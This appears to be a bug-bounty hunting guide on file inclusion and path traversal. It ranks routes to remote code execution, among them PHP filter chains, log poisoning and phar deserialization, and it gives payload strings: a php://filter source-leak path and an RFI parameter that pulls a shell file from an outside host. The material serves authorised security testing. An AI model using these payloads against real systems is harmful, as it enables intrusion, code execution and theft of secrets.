HUNT-LFI — Local / Remote File Inclusion & Path Traversal

Crown Jewel Targets

LFI that reaches code execution is Critical. Pure file-read is High when it exposes secrets (.env, wp-config.php, private keys, cloud creds), Medium when it only reads non-sensitive files.

Highest-value chains (in rough order of reliability in 2026):

• PHP filter-chain → RCE — the modern default. A bare php://filter file-read primitive is upgraded to RCE with no upload endpoint and no writable file by chaining iconv conversions to forge an arbitrary PHP payload in-memory (Synacktiv, 2022). See the dedicated section below. This is the single most impactful thing to try and the most-missed.
• Log poisoning → RCE — inject PHP into an Apache/Nginx log (User-Agent / URL path), then include the log. Increasingly blocked by open_basedir and unreadable log perms, so verify the log is readable first.
• PHP wrappers → source disclosure — php://filter/convert.base64-encode/resource=index.php leaks source; read source to find more LFI sinks, secrets, and the include base path.
• RFI → RCE — when allow_url_include=On, ?file=http://OOB/shell.txt pulls and executes remote code. Rare on modern configs but trivially Critical when present.
• phar:// deserialization — a crafted PHAR + any unserialize-on-metadata sink → object-injection RCE.
• zip:// / data:// chains and session/upload poisoning when filters block wrappers.

OOB / Blind-LFI Confirmation Gate (Read First)

LFI is frequently blind: the included content is parsed/executed but never reflected, or the page swallows the file into a template you can't see. Do not claim LFI from indirect signals alone.